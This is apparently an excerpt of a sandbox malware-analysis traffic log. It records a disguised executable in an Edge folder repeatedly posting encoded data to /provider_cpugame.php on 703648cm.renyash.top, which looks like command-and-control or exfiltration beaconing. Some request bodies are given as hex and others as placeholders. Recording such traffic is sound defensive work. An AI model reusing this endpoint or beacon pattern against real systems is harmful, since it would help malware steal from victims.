                                                                                                                      Data Ascii: X__VX[QRZ[[RU^QUXYYGRPTX][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\!A)=,>3>'-:9(5 *Y=$,'+)+"0&+?""&0#G!"^,
                                                                                                                      Dec 20, 2024 21:18:09.361283064 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:09.596148014 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:07 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      22 | 192.168.2.4 | 49771 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:09.841356039 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      23 | 192.168.2.4 | 49777 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:10.090325117 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      24 | 192.168.2.4 | 49782 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:10.452033043 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:10.801179886 CET | 2644 | OUT | [encoded request body]
                                                                                                                      Dec 20, 2024 21:18:11.722285032 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:11.956430912 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:09 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      25 | 192.168.2.4 | 49785 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:12.204051018 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:12.551309109 CET | 2644 | OUT | [encoded request body]
                                                                                                                      Dec 20, 2024 21:18:13.480375051 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:13.712321043 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:11 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      26 | 192.168.2.4 | 49789 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:13.952532053 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:14.301291943 CET | 2644 | OUT | [encoded request body]
                                                                                                                      Dec 20, 2024 21:18:15.219918966 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:15.452478886 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:13 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      27 | 192.168.2.4 | 49795 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:15.699909925 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:16.051325083 CET | 2644 | OUT | [encoded request body]
                                                                                                                      Dec 20, 2024 21:18:16.977648973 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:17.222526073 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:15 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      28 | 192.168.2.4 | 49801 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:17.469024897 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:17.816786051 CET | 2644 | OUT | [encoded request body]
                                                                                                                      Dec 20, 2024 21:18:18.739430904 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:18.972843885 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:17 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      29 | 192.168.2.4 | 49807 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:19.217680931 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:19.566967964 CET | 2644 | OUT | [encoded request body]
                                                                                                                      Dec 20, 2024 21:18:20.524444103 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:20.760865927 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:18 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      30 | 192.168.2.4 | 49810 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:21.023091078 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:21.379365921 CET | 2644 | OUT | [encoded request body]
                                                                                                                      Dec 20, 2024 21:18:22.286041021 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:22.520458937 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:20 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      31 | 192.168.2.4 | 49815 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:22.764338970 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:23.114018917 CET | 2644 | OUT | [encoded request body]
                                                                                                                      Dec 20, 2024 21:18:24.035455942 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:24.268378973 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:22 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      32 | 192.168.2.4 | 49820 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:24.515882015 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
Dec 20, 2024 21:18:24.863795996 CET | 2644 | OUT | POST body (encoded data)
Dec 20, 2024 21:18:25.785172939 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:18:26.024467945 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:24 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49825 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 21:18:26.425219059 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
Dec 20, 2024 21:18:26.769907951 CET | 2644 | OUT | POST body (encoded data)
Dec 20, 2024 21:18:27.705432892 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:18:27.944400072 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:25 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49832 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 21:18:28.189313889 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
Dec 20, 2024 21:18:28.535698891 CET | 2644 | OUT | POST body (encoded data)
Dec 20, 2024 21:18:29.460345984 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:18:29.692967892 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:27 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49837 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 21:18:29.945365906 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
Dec 20, 2024 21:18:30.301321030 CET | 2644 | OUT | POST body (encoded data)
Dec 20, 2024 21:18:31.216609001 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:18:31.452639103 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:29 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49841 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 21:18:31.699870110 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
Dec 20, 2024 21:18:32.051305056 CET | 2644 | OUT | POST body (encoded data)
Dec 20, 2024 21:18:32.982517958 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:18:33.216399908 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:31 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49847 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 21:18:33.468581915 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
Dec 20, 2024 21:18:33.816795111 CET | 2644 | OUT | POST body (encoded data)
Dec 20, 2024 21:18:34.744961023 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:18:34.972865105 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:32 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49853 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 21:18:35.216583014 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
Dec 20, 2024 21:18:35.566787004 CET | 2644 | OUT | POST body (encoded data)
Dec 20, 2024 21:18:36.501358986 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:18:36.736659050 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:34 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49859 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 21:18:36.982429981 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
Dec 20, 2024 21:18:37.332729101 CET | 2644 | OUT | POST body (encoded data)
Dec 20, 2024 21:18:38.267649889 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:18:38.501029015 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:36 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49864 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 21:18:38.749667883 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
Dec 20, 2024 21:18:39.098222971 CET | 2644 | OUT | POST body (encoded data)
Dec 20, 2024 21:18:40.019987106 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 20, 2024 21:18:40.252810955 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:38 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      41 | 192.168.2.4 | 49868 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:40.500386000 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:40.848577976 CET | 2644 | OUT | Data Raw: 58 5a 5f 52 58 5e 54 55 5a 5b 5b 52 55 50 51 56 58 59 59 40 52 54 54 5c 5d 5b 46 5f 53 5e 54 55 43 52 5b 52 58 52 52 54 59 5c 51 52 5d 56 54 53 55 5c 58 5a 58 5c 58 5d 5a 5e 53 56 5a 52 5a 5b 59 5b 5e 45 5f 52 58 54 58 5c 5f 53 59 5f 5e 53 51 5c
                                                                                                                      Data Ascii: XZ_RX^TUZ[[RUPQVXYY@RTT\][F_S^TUCR[RXRRTY\QR]VTSU\XZX\X]Z^SVZRZ[Y[^E_RXTX\_SY_^SQ\W\WEV]VVQ[C[Z]ZY\]TXBUYT^WP[_XXZWZT^QUV]Z_RYBZX\Q]T^_\XW[U_^YP\^TU]WUXYUG_[]WZ_Y\X]_S\QDQW^STUFUXPBPX\"=>+=9X'.":]9#\9*4]$5?Q&;$!*'#G!"^,
                                                                                                                      Dec 20, 2024 21:18:41.819082975 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:42.052251101 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:40 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      42 | 192.168.2.4 | 49872 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:18:42.295491934 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
